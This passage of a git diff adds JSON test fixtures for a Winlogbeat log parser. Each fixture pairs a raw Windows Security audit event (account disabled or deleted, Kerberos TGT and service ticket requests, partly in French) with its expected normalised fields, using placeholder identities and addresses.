+        "TargetSid": "S-4-5-6",
+        "TargetUserName": "ACCOUNT"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "12345678-abcd-ef90-1234-abcdef123456",
+      "name": "PC01",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "pc01",
+      "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+      "ip": [
+        "1.2.3.4"
+      ],
+      "mac": [
+        "00-11-22-33-44-55"
+      ],
+      "name": "pc01",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "pc01"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "jdoe",
+      "target": {
+        "domain": "DOMAIN",
+        "name": "ACCOUNT"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "PC01.domain.com",
+      "event_id": "4725",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x493fa12d"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 756,
+        "thread": {
+          "id": 7304
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "13042691344",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4726.json b/Beats/winlogbeat/tests/security_event_4726.json
new file mode 100644
index 000000000..e147e2eb4
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4726.json
@@ -0,0 +1,84 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}"
+  },
+  "expected": {
+    "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}",
+    "event": {
+      "action": "User Account Management",
+      "code": "4726",
+      "kind": "event",
+      "module": "security",
+      "original": "A user account was deleted.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tdoe.j\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3005C1F76\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tsmithee.a\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t-",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T07:58:13.288000Z",
+    "action": {
+      "id": 4726,
+      "outcome": "success",
+      "properties": {
+        "PrivilegeList": "-",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x3005c1f76",
+        "SubjectUserName": "doe.j",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "DOMAIN",
+        "TargetSid": "S-1-2-3-4-5",
+        "TargetUserName": "smithee.a"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "12345678-ABCD-ef90-1234-abcdef123456",
+      "name": "hostname",
+      "type": "winlogbeat",
+      "version": "7.17.1"
+    },
+    "host": {
+      "name": "hostname.domain.net"
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "user": [
+        "doe.j"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "doe.j",
+      "target": {
+        "domain": "DOMAIN",
+        "name": "smithee.a"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "hostname.domain.net",
+      "event_id": "4726",
+      "logon": {
+        "id": "0x3005c1f76"
+      },
+      "process": {
+        "pid": 632,
+        "thread": {
+          "id": 2056
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "25349190364",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json
new file mode 100644
index 000000000..53d650df2
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4768.json
@@ -0,0 +1,102 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}"
+  },
+  "expected": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}",
+    "event": {
+      "action": "Service d\u2019authentification Kerberos",
+      "code": "4768",
+      "kind": "event",
+      "module": "security",
+      "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T09:17:10.124000Z",
+    "action": {
+      "id": 4768,
+      "outcome": "success",
+      "properties": {
+        "IpAddress": "::ffff:1.2.3.4",
+        "IpPort": "51261",
+        "PreAuthType": "2",
+        "ServiceName": "service",
+        "ServiceSid": "S-1-2-3-4-5",
+        "Status": "0x0",
+        "TargetDomainName": "DOMAIN",
+        "TargetSid": "S-1-2-3",
+        "TargetUserName": "account",
+        "TicketEncryptionType": "0x12",
+        "TicketOptions": "0x40810010"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+      "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee",
+      "name": "AGENT",
+      "type": "winlogbeat",
+      "version": "8.11.1"
+    },
+    "host": {
+      "name": "HOSTNAME.domain.priv"
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "ip": [
+        "::ffff:102:304"
+      ],
+      "user": [
+        "account"
+      ]
+    },
+    "service": {
+      "name": "service"
+    },
+    "source": {
+      "address": "::ffff:102:304",
+      "ip": "::ffff:102:304",
+      "port": 51261
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "account",
+      "target": {
+        "domain": "DOMAIN",
+        "name": "account"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "HOSTNAME.domain.priv",
+      "event_data": {
+        "StatusDescription": "KDC_ERR_NONE"
+      },
+      "event_id": "4768",
+      "keywords": [
+        "Succ\u00e8s de l\u2019audit"
+      ],
+      "opcode": "Informations",
+      "process": {
+        "pid": 560,
+        "thread": {
+          "id": 3228
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "2476587536",
+      "task": "Service d\u2019authentification Kerberos"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json
new file mode 100644
index 000000000..7b1f0f39d
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4769.json
@@ -0,0 +1,101 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}"
+  },
+  "expected": {
+    "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource 